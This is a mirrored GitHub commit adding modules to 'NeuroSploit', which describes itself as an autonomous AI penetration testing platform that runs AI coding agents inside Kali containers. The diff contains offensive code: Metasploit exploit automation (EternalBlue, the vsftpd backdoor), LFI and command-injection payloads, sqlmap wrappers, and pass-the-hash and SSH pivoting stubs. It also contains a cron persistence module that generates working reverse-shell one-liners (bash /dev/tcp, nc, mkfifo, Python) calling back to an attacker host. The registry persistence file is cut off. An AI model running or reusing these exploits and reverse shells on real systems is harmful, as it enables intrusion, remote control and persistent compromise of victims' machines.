mirror of
https://github.com/CyberSecurityUP/NeuroSploit.git
synced 2026-04-21 10:26:18 +02:00
NeuroSploit v3.2 - Autonomous AI Penetration Testing Platform
116 modules | 100 vuln types | 18 API routes | 18 frontend pages Major features: - VulnEngine: 100 vuln types, 526+ payloads, 12 testers, anti-hallucination prompts - Autonomous Agent: 3-stream auto pentest, multi-session (5 concurrent), pause/resume/stop - CLI Agent: Claude Code / Gemini CLI / Codex CLI inside Kali containers - Validation Pipeline: negative controls, proof of execution, confidence scoring, judge - AI Reasoning: ReACT engine, token budget, endpoint classifier, CVE hunter, deep recon - Multi-Agent: 5 specialists + orchestrator + researcher AI + vuln type agents - RAG System: BM25/TF-IDF/ChromaDB vectorstore, few-shot, reasoning templates - Smart Router: 20 providers (8 CLI OAuth + 12 API), tier failover, token refresh - Kali Sandbox: container-per-scan, 56 tools, VPN support, on-demand install - Full IA Testing: methodology-driven comprehensive pentest sessions - Notifications: Discord, Telegram, WhatsApp/Twilio multi-channel alerts - Frontend: React/TypeScript with 18 pages, real-time WebSocket updates
This commit is contained in:
Executable
Executable
+1627
File diff suppressed because it is too large
Load Diff
Executable
+1
@@ -0,0 +1 @@
|
||||
"""Browser-based security validation tools using Playwright."""
|
||||
Executable
+211
@@ -0,0 +1,211 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Playwright Runner - Low-level browser automation helpers for security testing.
|
||||
|
||||
Provides convenience functions for common browser-based security validation tasks.
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import logging
|
||||
from typing import Dict, List, Optional
|
||||
from pathlib import Path
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
try:
|
||||
from playwright.async_api import async_playwright
|
||||
HAS_PLAYWRIGHT = True
|
||||
except ImportError:
|
||||
HAS_PLAYWRIGHT = False
|
||||
|
||||
|
||||
async def check_xss_reflection(url: str, payload: str, headless: bool = True) -> Dict:
|
||||
"""Check if a payload is reflected in page content or triggers a dialog.
|
||||
|
||||
Args:
|
||||
url: Target URL (payload should be in query params)
|
||||
payload: The XSS payload being tested
|
||||
headless: Run in headless mode
|
||||
|
||||
Returns:
|
||||
Dict with reflection status, dialog detection, and page content snippet
|
||||
"""
|
||||
if not HAS_PLAYWRIGHT:
|
||||
return {"error": "Playwright not installed"}
|
||||
|
||||
result = {
|
||||
"url": url,
|
||||
"payload": payload,
|
||||
"reflected": False,
|
||||
"dialog_triggered": False,
|
||||
"dialog_message": None,
|
||||
"content_snippet": ""
|
||||
}
|
||||
|
||||
async with async_playwright() as p:
|
||||
browser = await p.chromium.launch(headless=headless)
|
||||
context = await browser.new_context(ignore_https_errors=True)
|
||||
page = await context.new_page()
|
||||
|
||||
dialogs = []
|
||||
|
||||
async def on_dialog(dialog):
|
||||
dialogs.append(dialog.message)
|
||||
await dialog.dismiss()
|
||||
|
||||
page.on("dialog", on_dialog)
|
||||
|
||||
try:
|
||||
await page.goto(url, wait_until="networkidle", timeout=15000)
|
||||
content = await page.content()
|
||||
|
||||
if payload in content:
|
||||
result["reflected"] = True
|
||||
idx = content.find(payload)
|
||||
start = max(0, idx - 100)
|
||||
end = min(len(content), idx + len(payload) + 100)
|
||||
result["content_snippet"] = content[start:end]
|
||||
|
||||
if dialogs:
|
||||
result["dialog_triggered"] = True
|
||||
result["dialog_message"] = dialogs[0]
|
||||
|
||||
except Exception as e:
|
||||
result["error"] = str(e)
|
||||
finally:
|
||||
await browser.close()
|
||||
|
||||
return result
|
||||
|
||||
|
||||
async def capture_page_state(url: str, screenshot_path: str,
|
||||
headless: bool = True) -> Dict:
|
||||
"""Capture the full state of a page: screenshot, title, headers, cookies.
|
||||
|
||||
Args:
|
||||
url: Page URL to capture
|
||||
screenshot_path: Path to save the screenshot
|
||||
headless: Run in headless mode
|
||||
|
||||
Returns:
|
||||
Dict with page title, cookies, response headers, console messages
|
||||
"""
|
||||
if not HAS_PLAYWRIGHT:
|
||||
return {"error": "Playwright not installed"}
|
||||
|
||||
result = {
|
||||
"url": url,
|
||||
"title": "",
|
||||
"screenshot": screenshot_path,
|
||||
"cookies": [],
|
||||
"console_messages": [],
|
||||
"response_headers": {},
|
||||
"status_code": None
|
||||
}
|
||||
|
||||
async with async_playwright() as p:
|
||||
browser = await p.chromium.launch(headless=headless)
|
||||
context = await browser.new_context(ignore_https_errors=True)
|
||||
page = await context.new_page()
|
||||
|
||||
console_msgs = []
|
||||
page.on("console", lambda msg: console_msgs.append({
|
||||
"type": msg.type, "text": msg.text
|
||||
}))
|
||||
|
||||
try:
|
||||
response = await page.goto(url, wait_until="networkidle", timeout=20000)
|
||||
|
||||
result["title"] = await page.title()
|
||||
result["status_code"] = response.status if response else None
|
||||
result["response_headers"] = dict(response.headers) if response else {}
|
||||
|
||||
Path(screenshot_path).parent.mkdir(parents=True, exist_ok=True)
|
||||
await page.screenshot(path=screenshot_path, full_page=True)
|
||||
|
||||
cookies = await context.cookies()
|
||||
result["cookies"] = [
|
||||
{"name": c["name"], "domain": c["domain"],
|
||||
"secure": c["secure"], "httpOnly": c["httpOnly"],
|
||||
"sameSite": c.get("sameSite", "None")}
|
||||
for c in cookies
|
||||
]
|
||||
|
||||
result["console_messages"] = console_msgs
|
||||
|
||||
except Exception as e:
|
||||
result["error"] = str(e)
|
||||
finally:
|
||||
await browser.close()
|
||||
|
||||
return result
|
||||
|
||||
|
||||
async def test_form_submission(url: str, form_data: Dict[str, str],
|
||||
submit_selector: str = "button[type=submit]",
|
||||
screenshot_dir: str = "/tmp/form_test",
|
||||
headless: bool = True) -> Dict:
|
||||
"""Submit a form and capture before/after state.
|
||||
|
||||
Args:
|
||||
url: URL containing the form
|
||||
form_data: Dict of selector -> value to fill
|
||||
submit_selector: CSS selector for the submit button
|
||||
screenshot_dir: Directory to store screenshots
|
||||
headless: Run in headless mode
|
||||
|
||||
Returns:
|
||||
Dict with before/after screenshots, response info, and any triggered dialogs
|
||||
"""
|
||||
if not HAS_PLAYWRIGHT:
|
||||
return {"error": "Playwright not installed"}
|
||||
|
||||
ss_dir = Path(screenshot_dir)
|
||||
ss_dir.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
result = {
|
||||
"url": url,
|
||||
"before_screenshot": str(ss_dir / "before.png"),
|
||||
"after_screenshot": str(ss_dir / "after.png"),
|
||||
"dialogs": [],
|
||||
"response_url": "",
|
||||
"status": "unknown"
|
||||
}
|
||||
|
||||
async with async_playwright() as p:
|
||||
browser = await p.chromium.launch(headless=headless)
|
||||
context = await browser.new_context(ignore_https_errors=True)
|
||||
page = await context.new_page()
|
||||
|
||||
dialogs = []
|
||||
|
||||
async def on_dialog(dialog):
|
||||
dialogs.append({"type": dialog.type, "message": dialog.message})
|
||||
await dialog.dismiss()
|
||||
|
||||
page.on("dialog", on_dialog)
|
||||
|
||||
try:
|
||||
await page.goto(url, wait_until="networkidle", timeout=15000)
|
||||
await page.screenshot(path=result["before_screenshot"])
|
||||
|
||||
# Fill form fields
|
||||
for selector, value in form_data.items():
|
||||
await page.fill(selector, value)
|
||||
|
||||
# Submit
|
||||
await page.click(submit_selector)
|
||||
await page.wait_for_load_state("networkidle")
|
||||
|
||||
await page.screenshot(path=result["after_screenshot"], full_page=True)
|
||||
result["response_url"] = page.url
|
||||
result["dialogs"] = dialogs
|
||||
result["status"] = "completed"
|
||||
|
||||
except Exception as e:
|
||||
result["error"] = str(e)
|
||||
result["status"] = "error"
|
||||
finally:
|
||||
await browser.close()
|
||||
|
||||
return result
|
||||
Executable
+8
@@ -0,0 +1,8 @@
|
||||
from .exploitation_tools import (
|
||||
ExploitDatabase,
|
||||
MetasploitWrapper,
|
||||
WebExploiter,
|
||||
SQLInjector,
|
||||
RCEExploiter,
|
||||
BufferOverflowExploiter
|
||||
)
|
||||
Executable
+363
@@ -0,0 +1,363 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Exploitation Tools - Exploit database, Metasploit wrapper, specialized exploiters
|
||||
"""
|
||||
|
||||
import subprocess
|
||||
import json
|
||||
import requests
|
||||
from typing import Dict, List
|
||||
import logging
|
||||
import time
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class ExploitDatabase:
|
||||
"""Exploit database search and management"""
|
||||
|
||||
def __init__(self, config: Dict):
|
||||
self.config = config
|
||||
self.db_path = "/usr/share/exploitdb"
|
||||
|
||||
def search(self, service: str, version: str = None) -> List[Dict]:
|
||||
"""Search for exploits"""
|
||||
logger.info(f"Searching exploits for: {service} {version or ''}")
|
||||
|
||||
exploits = []
|
||||
|
||||
try:
|
||||
cmd = ['searchsploit', service]
|
||||
if version:
|
||||
cmd.append(version)
|
||||
|
||||
result = subprocess.run(
|
||||
cmd,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=30
|
||||
)
|
||||
|
||||
# Parse searchsploit output
|
||||
for line in result.stdout.split('\n'):
|
||||
if '|' in line and not line.startswith('-'):
|
||||
parts = line.split('|')
|
||||
if len(parts) >= 2:
|
||||
exploits.append({
|
||||
"title": parts[0].strip(),
|
||||
"path": parts[1].strip(),
|
||||
"module": self._path_to_module(parts[1].strip())
|
||||
})
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Exploit search error: {e}")
|
||||
|
||||
return exploits
|
||||
|
||||
def _path_to_module(self, path: str) -> str:
|
||||
"""Convert exploit path to module name"""
|
||||
return path.replace('/', '.').replace('.rb', '').replace('.py', '')
|
||||
|
||||
|
||||
class MetasploitWrapper:
|
||||
"""Metasploit Framework wrapper"""
|
||||
|
||||
def __init__(self, config: Dict):
|
||||
self.config = config
|
||||
self.msf_path = config.get('tools', {}).get('metasploit', '/usr/bin/msfconsole')
|
||||
|
||||
def exploit(self, target: str, vulnerability: Dict) -> Dict:
|
||||
"""Execute Metasploit exploit"""
|
||||
logger.info(f"Attempting Metasploit exploit on {target}")
|
||||
|
||||
service = vulnerability.get('service', '').lower()
|
||||
port = vulnerability.get('port', 0)
|
||||
|
||||
# Map service to exploit module
|
||||
module = self._select_module(service, vulnerability)
|
||||
|
||||
if module:
|
||||
return self.run_exploit(module, target, port)
|
||||
|
||||
return {"success": False, "message": "No suitable module found"}
|
||||
|
||||
def _select_module(self, service: str, vulnerability: Dict) -> str:
|
||||
"""Select appropriate Metasploit module"""
|
||||
modules = {
|
||||
'smb': 'exploit/windows/smb/ms17_010_eternalblue',
|
||||
'ssh': 'auxiliary/scanner/ssh/ssh_login',
|
||||
'ftp': 'exploit/unix/ftp/vsftpd_234_backdoor',
|
||||
'http': 'auxiliary/scanner/http/dir_scanner',
|
||||
'mysql': 'auxiliary/scanner/mysql/mysql_login',
|
||||
'postgres': 'auxiliary/scanner/postgres/postgres_login',
|
||||
'rdp': 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep'
|
||||
}
|
||||
|
||||
return modules.get(service)
|
||||
|
||||
def run_exploit(self, module: str, target: str, port: int = None) -> Dict:
|
||||
"""Run specific Metasploit module"""
|
||||
logger.info(f"Running module: {module}")
|
||||
|
||||
result = {
|
||||
"success": False,
|
||||
"module": module,
|
||||
"target": target,
|
||||
"output": "",
|
||||
"shell_access": False
|
||||
}
|
||||
|
||||
try:
|
||||
# Build MSF resource script
|
||||
resource_script = self._build_resource_script(module, target, port)
|
||||
|
||||
# Execute via msfconsole
|
||||
cmd = [self.msf_path, '-q', '-r', resource_script]
|
||||
proc = subprocess.run(
|
||||
cmd,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=300
|
||||
)
|
||||
|
||||
result["output"] = proc.stdout
|
||||
|
||||
# Check for successful exploitation
|
||||
if 'session opened' in proc.stdout.lower():
|
||||
result["success"] = True
|
||||
result["shell_access"] = True
|
||||
result["shell_info"] = self._extract_shell_info(proc.stdout)
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Metasploit execution error: {e}")
|
||||
result["error"] = str(e)
|
||||
|
||||
return result
|
||||
|
||||
def _build_resource_script(self, module: str, target: str, port: int = None) -> str:
|
||||
"""Build MSF resource script"""
|
||||
script_path = f"/tmp/msf_resource_{int(time.time())}.rc"
|
||||
|
||||
script_content = f"""use {module}
|
||||
set RHOST {target}
|
||||
"""
|
||||
|
||||
if port:
|
||||
script_content += f"set RPORT {port}\n"
|
||||
|
||||
script_content += """set ExitOnSession false
|
||||
exploit -z
|
||||
exit
|
||||
"""
|
||||
|
||||
with open(script_path, 'w') as f:
|
||||
f.write(script_content)
|
||||
|
||||
return script_path
|
||||
|
||||
def _extract_shell_info(self, output: str) -> Dict:
|
||||
"""Extract shell session information"""
|
||||
return {
|
||||
"type": "meterpreter",
|
||||
"established": True
|
||||
}
|
||||
|
||||
|
||||
class WebExploiter:
|
||||
"""Web application exploitation"""
|
||||
|
||||
def __init__(self, config: Dict):
|
||||
self.config = config
|
||||
|
||||
def exploit(self, target: str, vulnerability: Dict) -> Dict:
|
||||
"""Exploit web vulnerabilities"""
|
||||
vuln_type = vulnerability.get('type')
|
||||
|
||||
if vuln_type == 'xss':
|
||||
return self._exploit_xss(target, vulnerability)
|
||||
elif vuln_type == 'csrf':
|
||||
return self._exploit_csrf(target, vulnerability)
|
||||
elif vuln_type == 'lfi':
|
||||
return self._exploit_lfi(target, vulnerability)
|
||||
elif vuln_type == 'rfi':
|
||||
return self._exploit_rfi(target, vulnerability)
|
||||
|
||||
return {"success": False, "message": "Unknown vulnerability type"}
|
||||
|
||||
def _exploit_xss(self, target: str, vulnerability: Dict) -> Dict:
|
||||
"""Exploit XSS vulnerability"""
|
||||
payloads = [
|
||||
'<script>alert(1)</script>',
|
||||
'<img src=x onerror=alert(1)>',
|
||||
'<svg onload=alert(1)>'
|
||||
]
|
||||
|
||||
for payload in payloads:
|
||||
try:
|
||||
response = requests.get(
|
||||
f"{target}?{vulnerability.get('parameter')}={payload}",
|
||||
timeout=10
|
||||
)
|
||||
|
||||
if payload in response.text:
|
||||
return {
|
||||
"success": True,
|
||||
"vulnerability": "XSS",
|
||||
"payload": payload
|
||||
}
|
||||
except:
|
||||
continue
|
||||
|
||||
return {"success": False}
|
||||
|
||||
def _exploit_csrf(self, target: str, vulnerability: Dict) -> Dict:
|
||||
"""Exploit CSRF vulnerability"""
|
||||
return {"success": False, "message": "CSRF exploitation placeholder"}
|
||||
|
||||
def _exploit_lfi(self, target: str, vulnerability: Dict) -> Dict:
|
||||
"""Exploit Local File Inclusion"""
|
||||
payloads = [
|
||||
'../../../etc/passwd',
|
||||
'....//....//....//etc/passwd',
|
||||
'/etc/passwd'
|
||||
]
|
||||
|
||||
for payload in payloads:
|
||||
try:
|
||||
response = requests.get(
|
||||
f"{target}?file={payload}",
|
||||
timeout=10
|
||||
)
|
||||
|
||||
if 'root:' in response.text:
|
||||
return {
|
||||
"success": True,
|
||||
"vulnerability": "LFI",
|
||||
"payload": payload,
|
||||
"data": response.text[:500]
|
||||
}
|
||||
except:
|
||||
continue
|
||||
|
||||
return {"success": False}
|
||||
|
||||
def _exploit_rfi(self, target: str, vulnerability: Dict) -> Dict:
|
||||
"""Exploit Remote File Inclusion"""
|
||||
return {"success": False, "message": "RFI exploitation placeholder"}
|
||||
|
||||
|
||||
class SQLInjector:
|
||||
"""SQL Injection exploitation"""
|
||||
|
||||
def __init__(self, config: Dict):
|
||||
self.config = config
|
||||
self.sqlmap_path = config.get('tools', {}).get('sqlmap', '/usr/bin/sqlmap')
|
||||
|
||||
def exploit(self, target: str, vulnerability: Dict) -> Dict:
|
||||
"""Exploit SQL injection"""
|
||||
logger.info(f"Attempting SQL injection on {target}")
|
||||
|
||||
result = {
|
||||
"success": False,
|
||||
"vulnerability": "SQL Injection",
|
||||
"databases": [],
|
||||
"tables": [],
|
||||
"dumped_data": []
|
||||
}
|
||||
|
||||
try:
|
||||
# Basic SQLMap scan
|
||||
cmd = [
|
||||
self.sqlmap_path,
|
||||
'-u', target,
|
||||
'--batch',
|
||||
'--random-agent',
|
||||
'--dbs'
|
||||
]
|
||||
|
||||
proc = subprocess.run(
|
||||
cmd,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=300
|
||||
)
|
||||
|
||||
if 'available databases' in proc.stdout.lower():
|
||||
result["success"] = True
|
||||
result["databases"] = self._extract_databases(proc.stdout)
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"SQL injection error: {e}")
|
||||
result["error"] = str(e)
|
||||
|
||||
return result
|
||||
|
||||
def _extract_databases(self, output: str) -> List[str]:
|
||||
"""Extract database names from SQLMap output"""
|
||||
databases = []
|
||||
|
||||
for line in output.split('\n'):
|
||||
if '[*]' in line and len(line.strip()) > 4:
|
||||
db_name = line.split('[*]')[1].strip()
|
||||
if db_name and not db_name.startswith('available'):
|
||||
databases.append(db_name)
|
||||
|
||||
return databases
|
||||
|
||||
|
||||
class RCEExploiter:
|
||||
"""Remote Code Execution exploitation"""
|
||||
|
||||
def __init__(self, config: Dict):
|
||||
self.config = config
|
||||
|
||||
def exploit(self, target: str, vulnerability: Dict) -> Dict:
|
||||
"""Exploit RCE vulnerability"""
|
||||
logger.info(f"Attempting RCE on {target}")
|
||||
|
||||
# Test various RCE payloads
|
||||
payloads = [
|
||||
'; id',
|
||||
'| id',
|
||||
'`id`',
|
||||
'$(id)',
|
||||
'; whoami',
|
||||
'| whoami'
|
||||
]
|
||||
|
||||
for payload in payloads:
|
||||
try:
|
||||
response = requests.get(
|
||||
f"{target}?cmd={payload}",
|
||||
timeout=10
|
||||
)
|
||||
|
||||
# Check for command execution indicators
|
||||
if any(x in response.text.lower() for x in ['uid=', 'gid=', 'root', 'www-data']):
|
||||
return {
|
||||
"success": True,
|
||||
"vulnerability": "RCE",
|
||||
"payload": payload,
|
||||
"output": response.text[:500]
|
||||
}
|
||||
except:
|
||||
continue
|
||||
|
||||
return {"success": False}
|
||||
|
||||
|
||||
class BufferOverflowExploiter:
|
||||
"""Buffer overflow exploitation"""
|
||||
|
||||
def __init__(self, config: Dict):
|
||||
self.config = config
|
||||
|
||||
def exploit(self, target: str, vulnerability: Dict) -> Dict:
|
||||
"""Exploit buffer overflow"""
|
||||
logger.info(f"Attempting buffer overflow on {target}")
|
||||
|
||||
# This is a complex topic - placeholder for demonstration
|
||||
return {
|
||||
"success": False,
|
||||
"message": "Buffer overflow exploitation requires specific target analysis"
|
||||
}
|
||||
Executable
+9
@@ -0,0 +1,9 @@
|
||||
"""
|
||||
Lateral Movement Tools
|
||||
Contains modules for moving laterally across networks
|
||||
"""
|
||||
|
||||
from .smb_lateral import SMBLateral
|
||||
from .ssh_lateral import SSHLateral
|
||||
|
||||
__all__ = ['SMBLateral', 'SSHLateral']
|
||||
Executable
+99
@@ -0,0 +1,99 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
SMB Lateral Movement - Techniques for lateral movement via SMB/CIFS
|
||||
"""
|
||||
import logging
|
||||
from typing import Dict, List
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
class SMBLateral:
|
||||
"""
|
||||
SMB-based lateral movement techniques including
|
||||
pass-the-hash, share enumeration, and remote execution.
|
||||
"""
|
||||
def __init__(self, config: Dict):
|
||||
"""
|
||||
Initializes SMBLateral movement module.
|
||||
|
||||
Args:
|
||||
config (Dict): Configuration dictionary
|
||||
"""
|
||||
self.config = config
|
||||
logger.info("SMBLateral module initialized")
|
||||
|
||||
def enumerate_shares(self, target: str, username: str = None, password: str = None) -> Dict:
|
||||
"""
|
||||
Enumerate SMB shares on target system.
|
||||
|
||||
Args:
|
||||
target (str): Target IP or hostname
|
||||
username (str): Username for authentication
|
||||
password (str): Password for authentication
|
||||
|
||||
Returns:
|
||||
Dict: Share enumeration results
|
||||
"""
|
||||
logger.info(f"Enumerating SMB shares on {target}")
|
||||
|
||||
# This is a framework method - actual implementation would use
|
||||
# tools like smbclient, crackmapexec, or impacket
|
||||
results = {
|
||||
"target": target,
|
||||
"shares": [],
|
||||
"accessible_shares": [],
|
||||
"notes": "SMB enumeration requires external tools (smbclient, crackmapexec, impacket)"
|
||||
}
|
||||
|
||||
logger.warning("SMB share enumeration requires external tools to be configured")
|
||||
return results
|
||||
|
||||
def pass_the_hash(self, target: str, username: str, ntlm_hash: str) -> Dict:
|
||||
"""
|
||||
Attempt pass-the-hash authentication.
|
||||
|
||||
Args:
|
||||
target (str): Target IP or hostname
|
||||
username (str): Username
|
||||
ntlm_hash (str): NTLM hash
|
||||
|
||||
Returns:
|
||||
Dict: Authentication attempt results
|
||||
"""
|
||||
logger.info(f"Attempting pass-the-hash to {target} as {username}")
|
||||
|
||||
results = {
|
||||
"target": target,
|
||||
"username": username,
|
||||
"method": "pass-the-hash",
|
||||
"success": False,
|
||||
"notes": "Implementation requires impacket or crackmapexec"
|
||||
}
|
||||
|
||||
logger.warning("Pass-the-hash requires external tools (impacket, crackmapexec)")
|
||||
return results
|
||||
|
||||
def execute_remote_command(self, target: str, command: str, credentials: Dict) -> Dict:
|
||||
"""
|
||||
Execute command remotely via SMB.
|
||||
|
||||
Args:
|
||||
target (str): Target IP or hostname
|
||||
command (str): Command to execute
|
||||
credentials (Dict): Authentication credentials
|
||||
|
||||
Returns:
|
||||
Dict: Command execution results
|
||||
"""
|
||||
logger.info(f"Attempting remote command execution on {target}")
|
||||
|
||||
results = {
|
||||
"target": target,
|
||||
"command": command,
|
||||
"output": "",
|
||||
"success": False,
|
||||
"notes": "Remote execution requires psexec/wmiexec (impacket)"
|
||||
}
|
||||
|
||||
logger.warning("Remote command execution requires external tools")
|
||||
return results
|
||||
Executable
+107
@@ -0,0 +1,107 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
SSH Lateral Movement - Techniques for lateral movement via SSH
|
||||
"""
|
||||
import logging
|
||||
from typing import Dict, List
|
||||
import socket
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
class SSHLateral:
|
||||
"""
|
||||
SSH-based lateral movement techniques including
|
||||
key-based authentication, password spraying, and tunneling.
|
||||
"""
|
||||
def __init__(self, config: Dict):
|
||||
"""
|
||||
Initializes SSHLateral movement module.
|
||||
|
||||
Args:
|
||||
config (Dict): Configuration dictionary
|
||||
"""
|
||||
self.config = config
|
||||
logger.info("SSHLateral module initialized")
|
||||
|
||||
def check_ssh_access(self, target: str, port: int = 22) -> bool:
|
||||
"""
|
||||
Check if SSH is accessible on target.
|
||||
|
||||
Args:
|
||||
target (str): Target IP or hostname
|
||||
port (int): SSH port (default 22)
|
||||
|
||||
Returns:
|
||||
bool: True if SSH is accessible
|
||||
"""
|
||||
try:
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
sock.settimeout(5)
|
||||
result = sock.connect_ex((target, port))
|
||||
sock.close()
|
||||
|
||||
if result == 0:
|
||||
logger.info(f"SSH port {port} is open on {target}")
|
||||
return True
|
||||
else:
|
||||
logger.info(f"SSH port {port} is closed on {target}")
|
||||
return False
|
||||
except Exception as e:
|
||||
logger.error(f"Error checking SSH access: {e}")
|
||||
return False
|
||||
|
||||
def enumerate_ssh_keys(self, target: str, username: str) -> Dict:
|
||||
"""
|
||||
Enumerate potential SSH key locations.
|
||||
|
||||
Args:
|
||||
target (str): Target IP or hostname
|
||||
username (str): Target username
|
||||
|
||||
Returns:
|
||||
Dict: SSH key enumeration results
|
||||
"""
|
||||
logger.info(f"Enumerating SSH keys for {username}@{target}")
|
||||
|
||||
common_key_paths = [
|
||||
f"/home/{username}/.ssh/id_rsa",
|
||||
f"/home/{username}/.ssh/id_ed25519",
|
||||
f"/home/{username}/.ssh/id_ecdsa",
|
||||
f"/root/.ssh/id_rsa",
|
||||
f"/root/.ssh/authorized_keys"
|
||||
]
|
||||
|
||||
results = {
|
||||
"target": target,
|
||||
"username": username,
|
||||
"common_paths": common_key_paths,
|
||||
"notes": "Key extraction requires existing access to target system"
|
||||
}
|
||||
|
||||
return results
|
||||
|
||||
def create_ssh_tunnel(self, target: str, local_port: int, remote_host: str, remote_port: int) -> Dict:
|
||||
"""
|
||||
Create SSH tunnel for pivoting.
|
||||
|
||||
Args:
|
||||
target (str): SSH server to tunnel through
|
||||
local_port (int): Local port to bind
|
||||
remote_host (str): Remote host to reach
|
||||
remote_port (int): Remote port to reach
|
||||
|
||||
Returns:
|
||||
Dict: Tunnel creation results
|
||||
"""
|
||||
logger.info(f"Creating SSH tunnel: localhost:{local_port} -> {target} -> {remote_host}:{remote_port}")
|
||||
|
||||
results = {
|
||||
"tunnel_type": "ssh_forward",
|
||||
"local_port": local_port,
|
||||
"remote_host": remote_host,
|
||||
"remote_port": remote_port,
|
||||
"notes": "SSH tunneling requires paramiko or external ssh command"
|
||||
}
|
||||
|
||||
logger.warning("SSH tunneling requires paramiko library or ssh binary")
|
||||
return results
|
||||
Executable
+9
@@ -0,0 +1,9 @@
|
||||
"""
|
||||
Persistence Tools
|
||||
Contains modules for maintaining access to compromised systems
|
||||
"""
|
||||
|
||||
from .cron_persistence import CronPersistence
|
||||
from .registry_persistence import RegistryPersistence
|
||||
|
||||
__all__ = ['CronPersistence', 'RegistryPersistence']
|
||||
Executable
+101
@@ -0,0 +1,101 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Cron Persistence - Linux persistence via cron jobs
|
||||
"""
|
||||
import logging
|
||||
from typing import Dict, List
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
class CronPersistence:
|
||||
"""
|
||||
Cron-based persistence techniques for Linux systems.
|
||||
"""
|
||||
def __init__(self, config: Dict):
|
||||
"""
|
||||
Initializes CronPersistence module.
|
||||
|
||||
Args:
|
||||
config (Dict): Configuration dictionary
|
||||
"""
|
||||
self.config = config
|
||||
logger.info("CronPersistence module initialized")
|
||||
|
||||
def generate_cron_entry(self, command: str, interval: str = "daily") -> str:
|
||||
"""
|
||||
Generate a cron entry for persistence.
|
||||
|
||||
Args:
|
||||
command (str): Command to execute
|
||||
interval (str): Execution interval (hourly, daily, weekly, reboot)
|
||||
|
||||
Returns:
|
||||
str: Cron entry string
|
||||
"""
|
||||
logger.info(f"Generating cron entry for: {command}")
|
||||
|
||||
intervals = {
|
||||
"hourly": "0 * * * *",
|
||||
"daily": "0 0 * * *",
|
||||
"weekly": "0 0 * * 0",
|
||||
"reboot": "@reboot",
|
||||
"every_5min": "*/5 * * * *"
|
||||
}
|
||||
|
||||
cron_time = intervals.get(interval, "0 0 * * *")
|
||||
cron_entry = f"{cron_time} {command}"
|
||||
|
||||
logger.info(f"Generated cron entry: {cron_entry}")
|
||||
return cron_entry
|
||||
|
||||
def suggest_cron_locations(self, username: str = None) -> Dict:
|
||||
"""
|
||||
Suggest locations for cron-based persistence.
|
||||
|
||||
Args:
|
||||
username (str): Target username
|
||||
|
||||
Returns:
|
||||
Dict: Cron file locations and methods
|
||||
"""
|
||||
locations = {
|
||||
"user_crontab": f"crontab -e (for user {username or 'current'})",
|
||||
"system_cron_dirs": [
|
||||
"/etc/cron.d/",
|
||||
"/etc/cron.daily/",
|
||||
"/etc/cron.hourly/",
|
||||
"/etc/cron.weekly/",
|
||||
"/var/spool/cron/crontabs/"
|
||||
],
|
||||
"cron_files": [
|
||||
"/etc/crontab",
|
||||
f"/var/spool/cron/crontabs/{username}" if username else None
|
||||
]
|
||||
}
|
||||
|
||||
return {k: v for k, v in locations.items() if v is not None}
|
||||
|
||||
def generate_persistence_payload(self, callback_host: str, callback_port: int) -> Dict:
|
||||
"""
|
||||
Generate reverse shell cron payload.
|
||||
|
||||
Args:
|
||||
callback_host (str): Attacker's IP/hostname
|
||||
callback_port (int): Attacker's listening port
|
||||
|
||||
Returns:
|
||||
Dict: Payload information
|
||||
"""
|
||||
payloads = {
|
||||
"bash_tcp": f"bash -i >& /dev/tcp/{callback_host}/{callback_port} 0>&1",
|
||||
"nc_traditional": f"nc {callback_host} {callback_port} -e /bin/bash",
|
||||
"nc_mkfifo": f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {callback_host} {callback_port} >/tmp/f",
|
||||
"python": f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{callback_host}\",{callback_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
|
||||
}
|
||||
|
||||
return {
|
||||
"callback_host": callback_host,
|
||||
"callback_port": callback_port,
|
||||
"payloads": payloads,
|
||||
"recommendation": "Use bash_tcp or nc_mkfifo for reliability"
|
||||
}
|
||||
Executable
+125
@@ -0,0 +1,125 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Registry Persistence - Windows persistence via registry keys
|
||||
"""
|
||||
import logging
|
||||
from typing import Dict, List
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
class RegistryPersistence:
|
||||
"""
|
||||
Windows registry-based persistence techniques.
|
||||
"""
|
||||
def __init__(self, config: Dict):
|
||||
"""
|
||||
Initializes RegistryPersistence module.
|
||||
|
||||
Args:
|
||||
config (Dict): Configuration dictionary
|
||||
"""
|
||||
self.config = config
|
||||
logger.info("RegistryPersistence module initialized")
|
||||
|
||||
def get_persistence_keys(self) -> Dict:
|
||||
"""
|
||||
Get common Windows registry keys for persistence.
|
||||
|
||||
Returns:
|
||||
Dict: Registry persistence locations
|
||||
"""
|
||||
persistence_keys = {
|
||||
"run_keys": {
|
||||
"HKCU_Run": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
|
||||
"HKLM_Run": r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
|
||||
"HKCU_RunOnce": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce",
|
||||
